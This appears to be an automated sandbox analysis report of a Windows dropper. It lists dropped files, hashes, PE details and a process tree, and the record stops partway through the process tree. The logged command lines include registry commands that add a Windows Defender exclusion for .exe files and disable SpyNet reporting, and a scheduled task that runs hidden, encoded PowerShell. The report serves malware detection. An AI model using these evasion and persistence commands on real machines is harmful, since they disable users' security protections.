            Process:C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe
            File Type:RAGE Package Format (RPF),
            Category:dropped
            Size (bytes):4488
            Entropy (8bit):3.53775007196613
            Encrypted:false
            SSDEEP:96:W9H9h9j9n9a9K9o92939l9S9nyJ0L0F0ez0Q080t0+0wD:X
            MD5:E6D924A26BF12D51F8AEDEDC3938D4EE
            SHA1:057443FD854C78E22C3F9E23B32F7DA14EFB6A44
            SHA-256:CD64AC206B8916350C499DA34C4BA263752F543FF40F310D96004A4325EA53AA
            SHA-512:15F963DAAF95AAEAEB447550E68104557DBCD3A058FA4A86658F476E09C91021B69D685B8F53A2F7AB07F8BBD76CAC3B890F75D25F9950402FEA0FEC22949F29
            Malicious:false
            Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s...;.T.h.r.e.a.t.s._.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.2.5.4.5.1...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.5.6.5.9.6...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.4.2.8.7.2...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.1.4.7.7.4.9.3.7.3...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.

            C:\Windows\System32\GroupPolicy\gpt.ini

            Download File
            Process:C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):268
            Entropy (8bit):4.9507895998010145
            Encrypted:false
            SSDEEP:6:1QnMzYHxbnPonn3dXsMzYHxbnn/JIAuNhUHdhJg+5Rnn3dzC:1QM0HxbnIV0Hxbn/JnumuuzC
            MD5:A62CE44A33F1C05FC2D340EA0CA118A4
            SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
            SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
            SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
            Malicious:true
            Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.

            C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.job

            Download File
            Process:C:\Windows\SysWOW64\schtasks.exe
            File Type:data
            Category:dropped
            Size (bytes):532
            Entropy (8bit):3.6934815054692227
            Encrypted:false
            SSDEEP:12:lRGQ1ssvTlpFCfTM5pgQ1ssvTlFzcFaVQh:Lnv47O1nvrz8T
            MD5:0B328445984ABED0634AE8C7E45D53C8
            SHA1:F25A3356B5A843F249E523670A1FFC323A642348
            SHA-256:E1C7AC2DB6BD22AFD34A512B49D925757CE29B34B35AD9615C4C122D83978169
            SHA-512:8710E0236BC9CD624DFF7B5491F95DB3AAA255D7D8485F5C49361E216C2BD301281162714787B6D8D79A136F40D9291CA2B2034EEDC914F92686A0C71EAF0D68
            Malicious:false
            Preview:.....k[....A.. ..{..F.......<... .....s...............................Q.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.L.h.L.A.I.b.j.V.j.t.d.X.S.e.C.j.h.\.N.R.K.t.M.p.z.z.Q.q.e.B.b.P.a.\.f.d.K.x.p.P.d...e.x.e.....d.8. ./.s.i.t.e._.i.d. .5.2.5.4.0.3. ./.S...E.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.L.h.L.A.I.b.j.V.j.t.d.X.S.e.C.j.h.\.N.R.K.t.M.p.z.z.Q.q.e.B.b.P.a.....D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.a.l.f.o.n.s...................0...............................................

            C:\Windows\Temp\__PSScriptPolicyTest_aedgb5uc.4sx.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Windows\Temp\__PSScriptPolicyTest_k13f2ewv.k03.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\avEZCOa.exe

            Download File
            Process:C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):7079936
            Entropy (8bit):7.686915853000789
            Encrypted:false
            SSDEEP:98304:/s4AALTAk7Sxr3bbSarM172zp7TTJcOfYwTu31QPLM36QVvJMDTRn4QyIlMHLXrC:/s4r7SRS2N7+Of9u31QPQqQVBMHkeMx
            MD5:6F52A47480DAE7C97A64DD5AEBB8E426
            SHA1:204FE492E1CDEACEA89A4F3B2CF41626053BC992
            SHA-256:A506223F4CA78C5C90CA3E02D00A1FEF0E74B7050712C2A5E7EBAA160FA6C879
            SHA-512:994468252493276E3F3EBDE2F03153D16F862CE3277F234785116394F570BEC1E9BD7E49E40321957B7289F6BDB85A06871BBB162A552285C0B812A54FE5D78C
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 73%
            • Antivirus: Metadefender, Detection: 0%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P...._..P....a..P....`..P....K..P...P...Q..c.e..P....[..P..c.^..P..Rich.P..................PE..L...*.].................L...R...............`....@..................................6l...@..................................C..x....`..N........................J...................................ek.@............@...............................text....K.......L.................. ..`.data........`...:\..P..............@....idata..>....@........k.............@..@.rsrc...N....`........k.............@..@.reloc...J.......L....k.............@..B................................................................................................................................................................................................................................................................................................................................

            \Device\ConDrv

            Download File
            Process:C:\Windows\System32\gpupdate.exe
            File Type:ASCII text, with CRLF, CR line terminators
            Category:dropped
            Size (bytes):129
            Entropy (8bit):4.366220328806915
            Encrypted:false
            SSDEEP:3:gBgvKCGPE3UkEmdOO2AGN8cwwHBkEmdOO2AGN8cwow:guSFMEkErONGN83YkErONGN837
            MD5:EF6D648C3DA0518B784D661B0C0B1D3D
            SHA1:C5C5F6E4AD6C3FD8BE4313E1A7C2AF2CAA3184AD
            SHA-256:18C16D43EB823C1BC78797991D6BA2898ACA8EB2DE5FD6946BE880F7C6FBBEF5
            SHA-512:E1E0443CA2E0BAFAC7CBBFD36D917D751AC6BE2F3F16D0B67B43EEBD47D6A7C36F12423AFA95B6BF56E5AAD155675C3307EFC6E94F0808EB72EF27B093EADD67
            Malicious:false
            Preview:Updating policy.........Computer Policy update has completed successfully....User Policy update has completed successfully.......

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.996977701480335
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:file.exe
            File size:7631904
            MD5:2d9b13584ab871c81ff24c473468cffa
            SHA1:fc29f8a56d9b3ec01bfe432f83e88585df3aa32d
            SHA256:dd1f7353d20b255088e50490aaa88d53d56156842f2d235792f69be05fc3d56f
            SHA512:b605650f7d97a392c50791556a486abf02b45d9eb954232f1e1d3b99ff60d99692b6f8137103c88f26d5f5a0362499b36d9eab69af171a6c2116e054628ca8e0
            SSDEEP:196608:91OOqb6wAmr57KeFiFnfbqs+u8TtDKjXhnY:3O/bhrr57hIFfmTDKjm
            TLSH:1A7633A4B6E1CBB5D1E52833DED413C830F8F9240A2599E7EB887E2D747C9C8E536065
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y...s...,...s...r.!.s.......s...x...s.......s.......s.^.u...s.Rich..s.........PE..L....S.L...........

            File Icon

            Icon Hash:8484d4f2b8f47434

            Static PE Info

            General

            Entrypoint:0x414b04
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            DLL Characteristics:
            Time Stamp:0x4CE553F7 [Thu Nov 18 16:27:35 2010 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:3786a4cf8bfee8b4821db03449141df4

            Entrypoint Preview

            Instruction
            push ebp
            mov ebp, esp
            push FFFFFFFFh
            push 0041B9E0h
            push 00414A2Ch
            mov eax, dword ptr fs:[00000000h]
            push eax
            mov dword ptr fs:[00000000h], esp
            sub esp, 58h
            push ebx
            push esi
            push edi
            mov dword ptr [ebp-18h], esp
            call dword ptr [0041B074h]
            xor edx, edx
            mov dl, ah
            mov dword ptr [004233D0h], edx
            mov ecx, eax
            and ecx, 000000FFh
            mov dword ptr [004233CCh], ecx
            shl ecx, 08h
            add ecx, edx
            mov dword ptr [004233C8h], ecx
            shr eax, 10h
            mov dword ptr [004233C4h], eax
            push 00000001h
            call 00007F6870B2C8FBh
            pop ecx
            test eax, eax
            jne 00007F6870B2BA6Ah
            push 0000001Ch
            call 00007F6870B2BB28h
            pop ecx
            call 00007F6870B2C3ADh
            test eax, eax
            jne 00007F6870B2BA6Ah
            push 00000010h
            call 00007F6870B2BB17h
            pop ecx
            xor esi, esi
            mov dword ptr [ebp-04h], esi
            call 00007F6870B2E51Ch
            call dword ptr [0041B078h]
            mov dword ptr [00425A3Ch], eax
            call 00007F6870B2E3DAh
            mov dword ptr [00423340h], eax
            call 00007F6870B2E183h
            call 00007F6870B2E0C5h
            call 00007F6870B2DB20h
            mov dword ptr [ebp-30h], esi
            lea eax, dword ptr [ebp-5Ch]
            push eax
            call dword ptr [0041B07Ch]
            call 00007F6870B2E056h
            mov dword ptr [ebp-64h], eax
            test byte ptr [ebp-30h], 00000001h
            je 00007F6870B2BA68h
            movzx eax, word ptr [ebp+00h]

            Rich Headers

            Programming Language:
            • [ C ] VS98 (6.0) SP6 build 8804
            • [C++] VS98 (6.0) SP6 build 8804
            • [ C ] VS2010 build 30319
            • [ASM] VS2010 build 30319
            • [EXP] VC++ 6.0 SP5 build 8804

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x1e9e40x64.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000xa60.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x1f8.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x199ea0x19a00False0.5822884908536585DOS executable (COM)6.608494417524647IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x1b0000x44940x4600False0.31166294642857145data4.368016436198423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x200000x5a480x3200False0.122890625data1.370539432871311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .sxdata0x260000x40x200False0.02734375data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x270000xa600xc00False0.3388671875data3.3019646948427273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x274a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
            RT_ICON0x277880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States
            RT_DIALOG0x278d80xb8dataEnglishUnited States
            RT_STRING0x279900x94dataEnglishUnited States
            RT_STRING0x27a280x34dataEnglishUnited States
            RT_GROUP_ICON0x278b00x22dataEnglishUnited States
            RT_VERSION0x271e00x2bcdataEnglishUnited States

            Imports

            DLLImport
            OLEAUT32.dllVariantClear, SysAllocString
            USER32.dllSendMessageA, SetTimer, DialogBoxParamW, DialogBoxParamA, SetWindowLongA, GetWindowLongA, SetWindowTextW, LoadIconA, LoadStringW, LoadStringA, CharUpperW, CharUpperA, DestroyWindow, EndDialog, PostMessageA, ShowWindow, MessageBoxW, GetDlgItem, KillTimer, SetWindowTextA
            SHELL32.dllShellExecuteExA
            KERNEL32.dllGetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InterlockedIncrement, InterlockedDecrement, GetProcAddress, GetOEMCP, GetACP, GetCPInfo, IsBadCodePtr, IsBadReadPtr, GetFileType, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, HeapSize, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapCreate, HeapDestroy, GetEnvironmentVariableA, SetUnhandledExceptionFilter, TlsAlloc, ExitProcess, GetVersion, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, WaitForSingleObject, CloseHandle, CreateProcessA, SetCurrentDirectoryA, GetCommandLineW, GetVersionExA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetLastError, LoadLibraryA, AreFileApisANSI, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetWindowsDirectoryA, SetFileTime, CreateFileW, SetLastError, SetFileAttributesA, RemoveDirectoryA, SetFileAttributesW, RemoveDirectoryW, CreateDirectoryA, CreateDirectoryW, DeleteFileA, DeleteFileW, lstrlenA, GetFullPathNameA, GetFullPathNameW, GetCurrentDirectoryA, GetTempPathA, GetTempFileNameA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, ReadFile, WriteFile, SetEndOfFile, GetStdHandle, WaitForMultipleObjects, Sleep, VirtualAlloc, VirtualFree, CreateEventA, SetEvent, ResetEvent, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, GetCurrentThreadId, TlsSetValue, TlsGetValue, ExitThread

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            No network behavior found

            Statistics

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:17:13:26
            Start date:03/10/2022
            Path:C:\Users\user\Desktop\file.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\Desktop\file.exe
            Imagebase:0x400000
            File size:7631904 bytes
            MD5 hash:2D9B13584AB871C81FF24C473468CFFA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:1
            Start time:17:13:29
            Start date:03/10/2022
            Path:C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe
            Wow64 process (32bit):true
            Commandline:.\Install.exe
            Imagebase:0x400000
            File size:6549032 bytes
            MD5 hash:3ADC95B09B9644E908114624326E8D0B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 46%, ReversingLabs
            Reputation:low

            General

            Target ID:2
            Start time:17:13:30
            Start date:03/10/2022
            Path:C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe
            Wow64 process (32bit):true
            Commandline:.\Install.exe /S /site_id "525403"
            Imagebase:0x13a0000
            File size:7079936 bytes
            MD5 hash:6F52A47480DAE7C97A64DD5AEBB8E426
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 73%, ReversingLabs
            • Detection: 0%, Metadefender, Browse
            Reputation:moderate

            General

            Target ID:3
            Start time:17:13:34
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\forfiles.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
            Imagebase:0x2e0000
            File size:41472 bytes
            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Target ID:4
            Start time:17:13:34
            Start date:03/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:5
            Start time:17:13:34
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\forfiles.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
            Imagebase:0x2e0000
            File size:41472 bytes
            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Target ID:6
            Start time:17:13:35
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            Imagebase:0x11d0000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:7
            Start time:17:13:35
            Start date:03/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:8
            Start time:17:13:35
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:9
            Start time:17:13:35
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            Imagebase:0x11d0000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:10
            Start time:17:13:35
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:11
            Start time:17:13:35
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:12
            Start time:17:13:35
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
            Imagebase:0x10e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:13
            Start time:17:13:37
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            Imagebase:0xbb0000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:14
            Start time:17:13:38
            Start date:03/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:15
            Start time:17:13:38
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:schtasks /run /I /tn "gUpzuvmWb"
            Imagebase:0xbb0000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:16
            Start time:17:13:38
            Start date:03/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:17
            Start time:17:13:39
            Start date:03/10/2022
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
            Imagebase:0x7ff7fbaf0000
            File size:447488 bytes
            MD5 hash:95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:.Net C# or VB.NET

            General

            Target ID:18
            Start time:17:13:39
            Start date:03/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            General

            Target ID:19
            Start time:17:13:39
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:schtasks /DELETE /F /TN "gUpzuvmWb"
            Imagebase:0xbb0000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:20
            Start time:17:13:39
            Start date:03/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:21
            Start time:17:13:42
            Start date:03/10/2022
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
